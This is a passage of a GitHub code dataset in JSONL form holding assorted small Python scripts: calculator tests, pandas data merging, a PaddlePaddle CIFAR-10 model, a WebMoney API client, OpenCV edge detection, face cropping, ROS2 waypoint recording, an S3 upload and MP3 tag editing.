x_gold)","repo_name":"Kmmanki/bit_seoul","sub_path":"homework/samsung_2_startprice/samsung_npy_save.py","file_name":"samsung_npy_save.py","file_ext":"py","file_size_in_byte":3976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"75006733492","text":"#!/Library/Frameworks/Python.framework/Versions/3.7/bin python3\n\"\"\"\n__project_ = 'Test_Develop'\n__file_name__ = 'TestCal'\n__author__ = 'creamk'\n__time__ = '2020/8/12 20:26'\n__product_name = PyCharm\n# code is far away from bugs with the god animal protecting\n I love animals. They taste delicious.\n ┏┓ ┏┓\n ┏┛┻━━━┛┻┓\n ┃ ┃\n ┃ ┳┛ ┗┳ ┃\n ┃ ┻ ┃\n ┗━┓ ┏━┛\n ┃ ┗━━━┓\n ┃ 神兽保佑 ┣┓\n ┃ 永无BUG! ┏┛\n ┗┓┓ ┏ ━┳┓ ┏┛\n ┃┫┫ ┃┫┫\n ┗┻┛ ┗┻┛\n\"\"\"\nimport allure\nimport pytest\nimport yaml\nimport sys\n\n# sys.path.append(\"..\")\n# print(sys.path)\nfrom python_scripts.third_pytest_scripts_01.Calculator.MyCalculator import Calculator\n\n\ndef get_data(key):\n with open(\"../datas.yml\") as f:\n data = yaml.safe_load(f)\n for data in data[key]:\n yield tuple(data)\n\n\n@allure.feature(\"计算器\")\nclass TestCalculator:\n def setup_class(self):\n self.cal = Calculator()\n print(\"开始计算\")\n\n def teardown_class(self):\n print(\"结束计算\")\n\n @allure.story(\"整数加法\")\n @pytest.mark.parametrize(\n ['a', 'b', 'expect'],\n [data for data in get_data('integer_add')],\n ids=[\n '整数加法_结果1',\n '整数加法_结果2',\n '整数加法_结果3',\n '整数加法_结果4'\n ])\n def test_integer_add(self, a, b, expect):\n with allure.step(\"得到计算结果\"):\n print(\"得到计算结果\")\n result = self.cal.add(a, b)\n with allure.step(\"断言结果\"):\n print(\"断言判断\")\n assert expect == result\n\n @allure.story(\"整数除法\")\n @pytest.mark.parametrize(\n ['a', 'b', 'expect'],\n [data for data in get_data('integer_div')],\n ids=[\n '整数除法_结果1',\n '整数除法_结果2',\n '整数除法_结果3',\n '整数除法_结果4'\n ])\n def test_integer_div(self, a, b, expect):\n result = self.cal.div(a, b)\n assert expect == result\n\n @allure.story(\"小数加法\")\n @pytest.mark.parametrize(\n ['a', 'b', 'expect'],\n [data for data in get_data('float_add')],\n ids=[\n 'float_add_result1',\n 'float_add_result2',\n 'float_add_result3'\n ])\n def test_float_add(self, a, b, expect):\n result = self.cal.add(a, b)\n assert expect == result\n\n @allure.story(\"小数除法\")\n @allure.link(\"https://www.baidu.com\", name=\"百度\")\n @pytest.mark.parametrize(\n ['a', 'b', 'expect'],\n [data for data in get_data('float_div')],\n ids=[\n 'float_div_result1',\n 'float_div_result2',\n 'float_div_result3'\n ])\n def test_float_div(self, a, b, expect):\n result = self.cal.div(a, b)\n assert expect == result\n","repo_name":"creamk87/test_develop","sub_path":"third_pytest_scripts_01/TestCase_Calculator/TestCal.py","file_name":"TestCal.py","file_ext":"py","file_size_in_byte":3136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41714483976","text":"import pandas as pd\ndef merge_data(annotation, phenotypes, out_dir):\n #read in annotation from potentially different sources\n annots = [pd.read_csv(annot, index_col = 0, sep = \"\\t\") for annot in annotation]\n #find samples common to all annotation tables\n common_ids = set(annots[0].index.tolist())\n for annot in annots:\n common_ids = common_ids.intersection(set(annot.index.tolist()))\n common_ids = list(common_ids)\n annot_m = pd.concat([annot.loc[common_ids, ] for annot in annots], axis = 1)\n pheno_m = pd.read_csv(phenotypes, index_col = 0, sep = \"\\t\")\n is_in_annot_index = [i in pheno_m.index for i in annot_m.index]\n is_in_pheno_index = [i in annot_m.index for i in pheno_m.index]\n annot_m = annot_m.loc[is_in_annot_index,]\n pheno_m = pheno_m.loc[is_in_pheno_index,]\n #make sure pheno_m uses ? as missing characters\n pheno_m.where(pd.isnull(pheno_m), \"?\")\n #create dummy annotation to description mapping \n anno_map = pd.DataFrame(annot_m.columns, index = annot_m.columns) \n anno_map.columns = [\"description\"]\n anno_map.to_csv(\"{}/annot2desc.txt\".format(out_dir), sep = '\\t')\n #create dummy phenotype to description mapping \n pheno_map = pd.DataFrame(pheno_m.columns, index = pheno_m.columns) \n pheno_map.columns = [\"accession\"] \n pheno_map.to_csv(\"{}/pt2desc.txt\".format(out_dir), sep = '\\t')\n #write phenotypes and feature list to disk\n annot_m.columns.name = \"feats\"\n annot_m.T.to_csv(\"{}/feats.txt\".format(out_dir), columns = [], sep = '\\t')\n pheno_m.columns.name = \"phenotypes\"\n pheno_m.T.to_csv(\"{}/phenotypes.txt\".format(out_dir), columns = [], sep = '\\t')\n \n #create a joint annotation phenotype table\n m = pd.concat([annot_m, pheno_m], axis = 1)\n m.to_csv(\"{}/annot_pheno.dat\".format(out_dir), sep = '\\t')\n m.index.name = \"ids\"\n m.to_csv(\"{}/ids.txt\".format(out_dir), columns = [], sep = '\\t')\n #create dummy ids mapping\n ids_map = pd.DataFrame(m.index, index = m.index) \n ids_map.to_csv(\"{}/ids2name.txt\".format(out_dir), sep = '\\t')\n return pheno_m\n\nif __name__ == \"__main__\":\n import argparse\n parser = argparse.ArgumentParser(\"learn antibiotic resistance models\")\n parser.add_argument(\"annotation\", help= 'annotation table', nargs='+')\n parser.add_argument(\"phenotypes\", help= 'phenotype table')\n parser.add_argument(\"out_dir\", help= 'target')\n args = parser.parse_args()\n merge_data(**vars(args))\n","repo_name":"hzi-bifo/Model-T","sub_path":"traitarm/reconstruction/merge_annot_and_pt.py","file_name":"merge_annot_and_pt.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"33851813041","text":"import pandas as pd\nimport numpy as np\nimport scipy.stats as stats\nimport utils\n\n\n\ndef process_data(df_train, df_test, deal_nulls = 0, deal_outliers = 0):\n\n target = 'alcopops'\n train = df_train.copy()\n test = df_test.copy()\n\n # impute missings **************************************************************************************************\n # 0: Drop missings\n # 1: Mean or Median depending on distribution\n\n if deal_nulls == 0:\n train.dropna(inplace = True)\n test.replace(np.NaN, train.mean(), inplace = True)\n\n elif deal_nulls == 1:\n # see data distribution\n for column in train.drop(columns = target):\n shapiro_t, pvalue = stats.shapiro(train[column])\n\n if pvalue > 0.05:\n measure = train[column].median()\n else:\n measure = train[column].mean()\n\n train[column].replace(np.NaN, measure, inplace = True)\n test[column].replace(np.NaN, measure, inplace=True)\n\n # impute outliers **************************************************************************************************\n\n exclude = ['gender', 'year_collect', target]\n column_names = train.columns\n columns_to_search = [column for column in column_names if column not in exclude]\n\n if deal_outliers == 0:\n pass\n elif deal_outliers == 1:\n # winsoring\n p1 = 5\n p2 = 95\n train = utils.winsoring_smooth(train, columns_to_search, p1, p2)\n return train, test\n","repo_name":"vmanita/Genetic-Programming-Predictive","sub_path":"02_Code/project_02_regression/scripts/project_02_process.py","file_name":"project_02_process.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"2571148124","text":"import paddle\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport paddle.nn.functional as F\nfrom paddle.metric import Accuracy\nfrom paddle.static import InputSpec\n\n\n# train_images = np.zeros((50000, 32, 32, 3), dtype='float32')\n# train_labels = np.zeros((50000, 1), dtype='int32')\n# for i, data in enumerate(train_data):\n# train_image, train_label = data\n# train_image = train_image.reshape((3, 32, 32 )).astype('float32') / 255.\n# train_image = train_image.transpose(2, 1, 0) #(3,32,32)放入(32,32,3) 中需要轴变化一下啊\n# #train_image = train_image.transpose(1, 2, 0)\n# train_images[i, :, :, :] = train_image\n# train_labels[i, 0] = train_label\n# class_names = ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck']\n# plt.figure(figsize=(10,10))\n# sample_idxs = np.random.choice(50000, size=25, replace=False) #随机从50000中选择25个(range(0,50000))\n# for i in range(25):\n# plt.subplot(5, 5, i+1)\n# plt.xticks([])\n# plt.yticks([])\n# plt.imshow(train_images[sample_idxs[i]], cmap=plt.cm.binary)\n# plt.xlabel(class_names[train_labels[sample_idxs[i]][0]])\n# plt.show()\n\nclass MyNet(paddle.nn.Layer):\n def __init__(self):\n super(MyNet, self).__init__()\n\n self.conv1 = paddle.nn.Conv2D(in_channels=3, out_channels=32, kernel_size=(3, 3))\n self.pool1 = paddle.nn.MaxPool2D(kernel_size=2, stride=2)\n\n self.conv2 = paddle.nn.Conv2D(in_channels=32, out_channels=64, kernel_size=(2,2))\n self.pool2 = paddle.nn.MaxPool2D(kernel_size=2, stride=2)\n\n self.conv3 = paddle.nn.Conv2D(in_channels=64, out_channels=64, kernel_size=(2,2))\n\n self.flatten = paddle.nn.Flatten()\n\n self.linear1 = paddle.nn.Linear(in_features=64*6*6, out_features=64)\n self.linear2 = paddle.nn.Linear(in_features=64, out_features=10)\n\n def forward(self, x): #[3,32,32]\n x = self.conv1(x) #[32,30,30]\n x = F.relu(x)\n x = self.pool1(x) #[32,15,15]\n\n x = self.conv2(x) #[64,14,14]\n x = F.relu(x)\n x = self.pool2(x) #[64,7,7]\n\n x = self.conv3(x) #[64,6,6]\n x = F.relu(x)\n\n x = self.flatten(x) #[64*6*6]\n x = self.linear1(x) #input:64*6*6,output:64\n x = F.relu(x)\n x = self.linear2(x) #input:64,output10\n return x\n\n#定义selfLeNet网络 注意是Layer,不是layer\nclass selfLeNet(paddle.nn.Layer):\n def __init__(self):\n super(selfLeNet, self).__init__()\n self.conv1 = paddle.nn.Conv2D(in_channels=3,out_channels=32,kernel_size=5,stride=1,padding=2)\n self.max_pool1 = paddle.nn.MaxPool2D(kernel_size=2,stride=2)\n self.conv2 = paddle.nn.Conv2D(in_channels=32,out_channels=64,kernel_size=5,stride=1)\n self.max_pool2 = paddle.nn.MaxPool2D(kernel_size=2,stride=2)\n self.linear1 = paddle.nn.Linear(in_features=64*6*6,out_features=120)\n self.linear2 = paddle.nn.Linear(in_features=120,out_features=84)\n self.linear3 = paddle.nn.Linear(in_features=84,out_features=10)\n\n def forward(self,x): #[3,32,32]\n x = self.conv1(x) #[32,32,32]\n x = F.relu(x)\n x = self.max_pool1(x) #[32,16,16]\n x = self.conv2(x) #[64,12,12]\n x = F.relu(x)\n x = self.max_pool1(x) #[64,6,6]\n x = paddle.flatten(x,start_axis=1,stop_axis=-1) #[64*6*6]\n x = self.linear1(x) #input:64*6*6,output:120\n x = self.linear2(x)\n x = self.linear3(x)\n x = F.softmax(x)\n return x\n\n\n\nif __name__ == '__main__':\n\n train_data = paddle.vision.datasets.cifar.Cifar10(mode='train')\n #model = paddle.Model(MyNet())\n input = InputSpec([None,3,32,32], 'float32', 'image')\n label = InputSpec([None,1], 'int64', 'label')\n model = paddle.Model(selfLeNet(),input,label)\n opt = paddle.optimizer.SGD(learning_rate=0.001,parameters=model.parameters())\n model.prepare(optimizer=opt,loss=paddle.nn.CrossEntropyLoss(),metrics=Accuracy())\n\n model.fit(train_data=train_data,epochs=1,batch_size=264,verbose=1)\n\n model.save('./ouput/cifar',training=True)\n","repo_name":"cournnnnnn/train_test_daily","sub_path":"paddle2/cifar10_pre.py","file_name":"cifar10_pre.py","file_ext":"py","file_size_in_byte":4383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7813153903","text":"# -*- coding: utf-8 -*-\nimport os\nimport ssl\nfrom pprint import pformat\n\nimport xmltodict\nfrom lxml import etree\nfrom requests import Session\nfrom requests.adapters import HTTPAdapter\nfrom requests.packages.urllib3.poolmanager import PoolManager\nfrom wmsigner import Signer\n\n\nclass Ssl3HttpAdapter(HTTPAdapter):\n \"\"\"Transport adapter\" that allows us to use SSLv3.\"\"\"\n\n def init_poolmanager(self, connections, maxsize, block=False):\n self.poolmanager = PoolManager(\n num_pools=connections,\n maxsize=maxsize,\n block=block,\n ssl_version=ssl.PROTOCOL_SSLv23\n )\n\n\nclass AuthInterface(object):\n \"\"\"Интерфейс аунтефикации.\"\"\"\n\n def wrap_request(self, request_params):\n return request_params\n\n def wrap_body_tree(self, tree):\n return tree\n\n def get_url_by_name(self, name):\n raise NotImplementedError\n\n\nclass WMLightAuthInterface(AuthInterface):\n\n def __init__(self, pub_cert, priv_key=None):\n if not os.path.exists(pub_cert):\n raise ValueError(\"Incorrect path to pub certificate\")\n if priv_key and not os.path.exists(priv_key):\n raise ValueError(\"Incorrect path to private key\")\n self.cert = os.path.abspath(\n pub_cert) if priv_key is None else (os.path.abspath(pub_cert),\n os.path.abspath(priv_key))\n\n def wrap_request(self, request_params):\n request_params.update({\"cert\": self.cert})\n return request_params\n\n def get_url_by_name(self, name):\n if name == \"FindWMPurseNew\":\n return \"https://w3s.wmtransfer.com/asp/XMLFindWMPurseCertNew.asp\"\n return \"https://w3s.wmtransfer.com/asp/XML{}Cert.asp\".format(name)\n\n\nclass WMProAuthInterface(AuthInterface):\n SIGN_STRUCTURE = {\n \"testwmpurse\": (\"wmid\", \"purse\"),\n \"getpurses\": (\"wmid\", \"reqn\"),\n \"invoice\": (\"orderid\", \"customerwmid\", \"storepurse\", \"amount\", \"desc\",\n \"address\", \"period\", \"expiration\", \"reqn\"),\n \"trans\": (\"reqn\", \"tranid\", \"pursesrc\", \"pursedest\", \"amount\",\n \"period\", \"pcode\", \"desc\", \"wminvid\"),\n \"getoperations\": (\"purse\", \"reqn\"),\n \"getoutinvoices\": (\"purse\", \"reqn\"),\n \"finishprotect\": (\"wmtranid\", \"pcode\", \"reqn\"),\n \"message\": (\"receiverwmid\", \"reqn\", \"msgtext\"),\n \"testsign\": (\"wmid\", \"wmid\", \"plan\", \"sign\"),\n \"getininvoices\": (\"wmid\", \"wminvid\", \"datestart\", \"datefinish\", \"reqn\")\n }\n\n def __init__(self, wmid, password, keys_file_path):\n self.wmid = wmid\n self.signer = Signer(wmid=wmid, keys=keys_file_path, password=password)\n\n def _get_sing(self, tree):\n interface_name = tree.findall('.//')[1].tag\n interface_tag = tree.find(interface_name)\n sign_params_names = self.SIGN_STRUCTURE[interface_name]\n return self.signer.sign(''.join([tree.find(param).text\n if tree.find(param) is not None else interface_tag.find(param).text\n for param in sign_params_names]))\n\n def wrap_body_tree(self, tree):\n wmid = etree.Element('wmid')\n wmid.text = self.wmid\n tree.append(wmid)\n sign = etree.Element('sign')\n sign.text = self._get_sing(tree)\n tree.append(sign)\n return tree\n\n def get_url_by_name(self, name):\n if name == \"FindWMPurseNew\":\n return \"https://w3s.webmoney.ru/asp/XMLFindWMPurseNew.asp\"\n return \"https://w3s.webmoney.ru/asp/XML{}.asp\".format(name)\n\n\nclass ApiInterface(object):\n \"\"\"Основной интерфейс API.\n\n Пример использования::\n\n api = ApiInterface(WMLightAuthInterface(\n \"/home/stas/wmcerts/crt.pem\", \"/home/stas/wmcerts/key.pem\"))\n\n import time\n api.x8(purse=\"R328079907035\", reqn=int(time.time()))[\n \"response\"][\"wmid\"][\"#text\"]\n\n Проксирует интерфейсы X1 - X10 в соответствующие атрибуты.\n \"\"\"\n\n API_METADATA = {\n \"FindWMPurseNew\": {\n \"root_name\": \"testwmpurse\",\n \"aliases\": [\"x8\"]\n },\n \"Purses\": {\n \"root_name\": \"getpurses\",\n \"aliases\": [\"x9\"],\n \"response_name\": \"purses\"\n },\n \"Invoice\": {\n \"root_name\": \"invoice\",\n \"aliases\": [\"x1\"]\n },\n \"Trans\": {\n \"root_name\": \"trans\",\n \"aliases\": [\"x2\"],\n \"response_name\": \"operation\"\n },\n \"Operations\": {\n \"root_name\": \"getoperations\",\n \"aliases\": [\"x3\"],\n \"response_name\": \"operations\"\n },\n \"OutInvoices\": {\n \"root_name\": \"getoutinvoices\",\n \"aliases\": [\"x4\"],\n \"response_name\": \"outinvoices\"\n },\n \"FinishProtect\": {\n \"root_name\": \"finishprotect\",\n \"aliases\": [\"x5\"],\n \"response_name\": \"operation\"\n },\n \"SendMsg\": {\n \"root_name\": \"message\",\n \"aliases\": [\"x6\"]},\n \"ClassicAuth\": {\n \"root_name\": \"testsign\",\n \"aliases\": [\"x7\"]\n },\n \"InInvoices\": {\n \"root_name\": \"getininvoices\",\n \"aliases\": [\"x10\"],\n \"response_name\": \"ininvoices\"\n }\n }\n \"\"\"\n Метаданные интерфейсов API Webmoney.\n Имеют следующую структуру::\n\n \t{:{\n \t\t\"root_name\": , \n \t\t\"aliases\": [, , ...], \n \t\t\"response_name\": \n \t}}\n\n Параметры имеют следующий смысл:\n\n :param interface_name: Название интерфейса в URL, например, для X9 (https://w3s.webmoney.ru/asp/XMLPurses.asp) названием будет Purses. Название используется при конструировании урла \n :param root_name: название рутового элемента секции данных запроса \n :param response_name: Название рутового элемента секции данных ответа(если не задан, берется **root_name**)\n\n \"\"\"\n\n def __init__(self, authenticationStrategy):\n self.authStrategy = authenticationStrategy\n\n def _check_params(self, params):\n for key, value in params:\n assert key in self.API_METADATA\n\n def _get_root_name_by_interface_name(self, interface_name):\n assert interface_name in self.API_METADATA, \"Incorrect interface name: %s\" % interface_name\n return self.API_METADATA[interface_name][\"root_name\"]\n\n def _create_xml_request_params(self, interface_name, params):\n \"\"\"\n Создает подзапрос, различающийся для каждого WM интерфейса\n :param interface_name: Название интерфейса\n :param params: Словарь аргументов\n \"\"\"\n root_name = self._get_root_name_by_interface_name(interface_name)\n tree = etree.Element(root_name)\n for key, value in params.items():\n subelement = etree.Element(key)\n subelement.text = value\n tree.append(subelement)\n\n return tree\n\n def _create_request(self, interface, **kwargs):\n \"\"\"Создает словарь параметров запроса к api.\n\n Тут вызывается функция :func:`AuthInterface.wrap_request`.\n \"\"\"\n request_params = {\n \"url\": self.authStrategy.get_url_by_name(interface),\n \"verify\": False\n }\n\n request_params = self.authStrategy.wrap_request(request_params)\n\n return request_params\n\n def _create_body(self, interface, **params):\n \"\"\"Создает XML-тело запроса.\n\n Тут вызывается функция :func:`AuthInterface.wrap_body_tree`.\n \"\"\"\n tree = etree.Element(\"w3s.request\")\n reqn = params.pop(\"reqn\", None)\n _ = etree.Element(\"reqn\")\n if reqn:\n _.text = str(int(reqn))\n else:\n _.text = \"\"\n tree.append(_)\n tree.append(self._create_xml_request_params(interface, params))\n tree = self.authStrategy.wrap_body_tree(tree)\n return etree.tostring(tree)\n\n def _make_request(self, interface, **params):\n \"\"\"Функция, делающая HTTP запрос к API.\"\"\"\n request_params = self._create_request(interface, **params)\n body = self._create_body(interface, **params)\n request_params.update({\"data\": body})\n s = Session()\n a = Ssl3HttpAdapter(max_retries=3)\n s.mount('https://', a)\n response = s.get(**request_params)\n if response.status_code != 200:\n raise ValueError(\"Bad response from webmoney api server: ({}) {}\".format(response.status_code, response.text))\n out = xmltodict.parse(response.text)[\"w3s.response\"]\n try:\n response_name = self.API_METADATA[interface].get(\n \"response_name\", None) or self.API_METADATA[interface][\"root_name\"]\n resp = out[response_name]\n except:\n out = u\"Error while requesting API. retval = %s, retdesc = %s\" % (\n out[\"retval\"], out[\"retdesc\"]) + \"\\n\" +\\\n u\"Request data: %s\" % pformat(request_params)\n raise ValueError(out.encode(\"utf-8\"))\n return {\"retval\": out[\"retval\"],\n \"retdesc\": out[\"retdesc\"],\n \"response\": resp}\n\n def __getattribute__(self, name):\n if name in ApiInterface.API_METADATA.keys():\n def _callback(**params):\n return self._make_request(name, **params)\n return _callback\n\n for key, aliases in ApiInterface.API_METADATA.items():\n aliases = aliases[\"aliases\"]\n if name.lower() in aliases:\n def _callback(**params):\n return self._make_request(key, **params)\n return _callback\n return object.__getattribute__(self, name)\n","repo_name":"andruwwwka/webmoney-api-interfaces","sub_path":"webmoney_api_interfaces/interfaces.py","file_name":"interfaces.py","file_ext":"py","file_size_in_byte":10242,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"17186138792","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Feb 20 13:34:28 2019\r\n\r\n@author: kpickrel\r\n\r\nEdge detection OPENCV\r\n\r\n\"\"\"\r\n\r\nimport cv2\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\n\r\nimg = cv2.imread('C:\\opencv\\sources\\samples\\python2\\data\\messi.jpg',0)\r\n\r\n\r\n\r\nfor i in range(0,1500,100):\r\n edges = cv2.Canny(img,0,i)\r\n \r\n plt.figure(figsize=(20,10))\r\n plt.subplot(121), plt.imshow(img, cmap = 'gray')\r\n plt.title('Original Image'), plt.xticks([]), plt.yticks([])\r\n \r\n plt.subplot(122), plt.imshow(edges, cmap = 'gray')\r\n plt.title('Edge Image'), plt.xticks([]), plt.yticks([])","repo_name":"gopher93/-100DaysOfCode-Pyd-and-C-","sub_path":"Day3-edgeDetector.py","file_name":"Day3-edgeDetector.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26809707946","text":"from flask import Flask, request\nimport keras\nimport keras.models\nfrom scipy.misc import imread, imresize\nfrom io import BytesIO\nimport base64\nfrom flask_cors import CORS\nimport numpy\nimport json\nimport random\nimport math\nimport tensorflow as tf\nimport skimage.util\nimport skimage.draw\n\nfrom .tensorflow_face_detection.inference_usbCam_face import TensoflowFaceDector\n\napp = Flask(__name__)\nCORS(app)\n\nwith tf.device('/cpu:0'):\n beautyModel = keras.models.load_model('beauty_model')\n beautyModel._make_predict_function()\n\n PATH_TO_CKPT = './howhotami/tensorflow_face_detection/model/frozen_inference_graph_face.pb'\n tDetector = TensoflowFaceDector(PATH_TO_CKPT)\n\ndef cropFace(imageData):\n (boxes, scores, classes, num_detections) = tDetector.run(imageData)\n\n box = boxes[0][0]\n ymin, xmin, ymax, xmax = tuple(box)\n\n xmin = int(xmin * imageData.shape[1])\n xmax = int(xmax * imageData.shape[1])\n\n ymin = int(ymin * imageData.shape[0])\n ymax = int(ymax * imageData.shape[0])\n\n circleCenterX = int(xmax/2 + xmin/2)\n circleCenterY = int(ymax/2 + ymin/2)\n\n circleRadius = int(max(ymax - ymin, xmax - xmin) * 0.5 * 1.2)\n\n mask = numpy.zeros((imageData.shape[0], imageData.shape[1], 3), dtype=numpy.uint8)\n\n rr, cc = skimage.draw.circle(circleCenterY, circleCenterX, circleRadius, shape=(imageData.shape[0], imageData.shape[1]))\n mask[rr, cc, :] = 1\n\n out = imageData * mask\n white = 255 * (1.0 - mask)\n\n imageData = out + white\n\n xmin = circleCenterX - circleRadius\n xmax = circleCenterX + circleRadius\n\n ymin = circleCenterY - circleRadius\n ymax = circleCenterY + circleRadius\n\n xmin = max(0, int(xmin))\n xmax = min(imageData.shape[1], int(xmax))\n\n ymin = max(0, int(ymin))\n ymax = min(imageData.shape[0], int(ymax))\n\n cropped = imageData[ymin:ymax, xmin:xmax, :]\n\n return cropped\n\n\ndef cropFaceAndPad(imageData):\n outWidth = 350\n outHeight = 350\n\n imageData = cropFace(imageData)\n\n squareSize = max(imageData.shape[0], imageData.shape[1])\n\n padHeight = (max(0, int(math.floor((squareSize-imageData.shape[0])/2))), max(0, int(math.ceil((squareSize-imageData.shape[0])/2))))\n padWidth = (max(0, int(math.floor((squareSize-imageData.shape[1])/2))), max(0, int(math.ceil((squareSize-imageData.shape[1])/2))))\n\n imageData = skimage.util.pad(imageData, pad_width=[padHeight, padWidth, (0, 0)], mode='constant', constant_values=255)\n\n imageData = imresize(imageData, (outWidth, outHeight))\n\n # Convert to greyscale\n imageData = numpy.repeat(numpy.reshape(numpy.average(imageData, axis=2), newshape=(outWidth, outHeight, 1)), 3, axis=2)\n\n return numpy.array(imageData, dtype=numpy.float64)\n\n","repo_name":"genixpro/how-hot-am-i","sub_path":"server/howhotami/face_cropper.py","file_name":"face_cropper.py","file_ext":"py","file_size_in_byte":2701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42751274625","text":"n=2\ni=2\ndicio={}\nwhile n<1001:\n contador=0\n n=i\n while n>1:\n if n%2==0:\n n=n/2\n contador+=1\n else:\n n=n*3+1\n contador+=1\n n=i\n dicio[i]=contador\n i+=1\nprint(max(dicio,key=dicio.get))","repo_name":"gabriellaec/desoft-analise-exercicios","sub_path":"backup/user_116/ch39_2020_04_13_17_25_33_289697.py","file_name":"ch39_2020_04_13_17_25_33_289697.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20860796981","text":"import rclpy\nfrom rclpy.node import Node\nfrom nav_msgs.msg import Odometry\nfrom geometry_msgs.msg import Twist, Pose\nfrom rclpy.qos import qos_profile_sensor_data\nfrom sensor_msgs.msg import LaserScan\nfrom nav_msgs.msg import OccupancyGrid\nimport numpy as np\nimport math\nimport cmath\nimport time\nimport pickle\n\n# constants\nnum_of_waypoints = 12\nwaypoints = {}\n\n# initialising an array with number of waypoints as predefined\nfor i in range(1, num_of_waypoints + 1):\n waypoints[i].extend([])\n\n# code from https://automaticaddison.com/how-to-convert-a-quaternion-into-euler-angles-in-python/\ndef euler_from_quaternion(x, y, z, w):\n \"\"\"\n Convert a quaternion into euler angles (roll, pitch, yaw)\n roll is rotation around x in radians (counterclockwise)\n pitch is rotation around y in radians (counterclockwise)\n yaw is rotation around z in radians (counterclockwise)\n \"\"\"\n t0 = +2.0 * (w * x + y * z)\n t1 = +1.0 - 2.0 * (x * x + y * y)\n roll_x = math.atan2(t0, t1)\n\n t2 = +2.0 * (w * y - z * x)\n t2 = +1.0 if t2 > +1.0 else t2\n t2 = -1.0 if t2 < -1.0 else t2\n pitch_y = math.asin(t2)\n\n t3 = +2.0 * (w * z + x * y)\n t4 = +1.0 - 2.0 * (y * y + z * z)\n yaw_z = math.atan2(t3, t4)\n\n return roll_x, pitch_y, yaw_z # in radians\n \nclass Waypoint(Node):\n\n def __init__(self):\n super().__init__('waypoint')\n # initialize variables\n self.roll = 0\n self.pitch = 0\n self.yaw = 0\n self.px = 0.0\n self.py = 0.0\n self.ox = 0.0\n self.oy = 0.0\n self.oz = 0.0\n \n # create subscription to track orientation\n self.m2b_subscription = self.create_subscription(\n Pose,\n 'map2base',\n self.m2b_callback,\n 10)\n self.m2b_subscription # prevent unused variable warning\n \n\n def m2b_callback(self, msg):\n self.px = msg.position.x\n self.py = msg.position.y\n orien = msg.orientation\n self.ox, self.oy, self.oz = euler_from_quaternion(orien.x, orien.y, orien.z, orien.w)\n\n \n def get_waypoints(self):\n n = num_of_waypoints\n while n != 0:\n inp = input(\"Enter input: \")\n if inp == \"w\":\n checkpt_id = int(input(\"Enter checkpoint: \"))\n print(\"saving..\")\n rclpy.spin_once(self)\n \n data = [self.px, self.py, self.ox, self.oy, self.oz]\n waypoints[checkpt_id].extend(data)\n print(waypoints)\n n -= 1\n elif inp == \"s\":\n print(\"saving...\")\n with open('waypoints.pickle', 'wb') as handle:\n pickle.dump(waypoints, handle, protocol=pickle.HIGHEST_PROTOCOL)\n n -= 1\n else:\n print(\"Please enter 's' or 'w' only.\")\n\ndef main(args=None):\n rclpy.init(args=args)\n try:\n waypoint = Waypoint()\n start = input(\"Press s to start: \")\n if start == \"s\":\n waypoint.get_waypoints()\n except KeyboardInterrupt:\n waypoint.destroy_node()\n rclpy.shutdown()\n\n\nif __name__ == '__main__':\n main()","repo_name":"applepiofmyeye/navigation_eg2310","sub_path":"rpi/get_waypoints_m2b.py","file_name":"get_waypoints_m2b.py","file_ext":"py","file_size_in_byte":3179,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"43923084265","text":"import logging\nimport boto3\nimport os\nimport sys\nfrom botocore.exceptions import ClientError\n\nACCESS_KEY = str(sys.argv[1])\nSECRET_KEY = str(sys.argv[2])\npath = 'C:/Users/patri/Documents/SSolutions/loadFile/'\nfile = sorted(os.listdir(path))[::-1][0]\ns3Folder = 'consumos'\n\ndef uploadToS3(file_name, bucket, object_name=None):\n if object_name is None:\n object_name = file_name\n\n s3_client = boto3.client('s3',aws_access_key_id=ACCESS_KEY,aws_secret_access_key=SECRET_KEY)\n try:\n response = s3_client.upload_file(file_name, bucket, object_name)\n except ClientError as e:\n logging.error(e)\n return False\n return True\n\nresp = uploadToS3(path+str(file),'consumos-ss',s3Folder+'/'+str(file))\nprint(resp)\n","repo_name":"PatricioGT/SimingSolutions-DataEngineer","sub_path":"uploadToS3.py","file_name":"uploadToS3.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12477266721","text":"import re\nimport os\nimport mutagen\nfrom mutagen.easyid3 import EasyID3\n\n\n# audio = EasyID3('src/20120107晚清有个李鸿章.mp3')\n# print(len(audio.keys()))\n# for key in audio.keys():\n# print(key, '-->', audio[key])\n\n\ndef getTitleFromFileName(filename):\n filenameRegex = re.compile(r'(.*).mp3', re.IGNORECASE)\n mo = filenameRegex.search(filename)\n if mo == None:\n return None\n titleName = mo.group(1)\n return titleName\n\n\nfolder_path = 'C:/Users/liang/Documents/压缩版/《2010年老梁说天下88集MP3》'\nalbum_name = folder_path.rsplit('/', 1)[1]\nprint(album_name)\nalbum_name = '2010年老梁说天下88集MP3'\nprint(album_name)\n\nfile_list = os.listdir(folder_path)\nfor index, f in enumerate(file_list):\n title_name = getTitleFromFileName(f)\n if title_name == None:\n continue\n print('###', index + 1)\n print(f, '-->', title_name)\n file_full_path = folder_path + '/' + f\n try:\n audio = EasyID3(file_full_path)\n 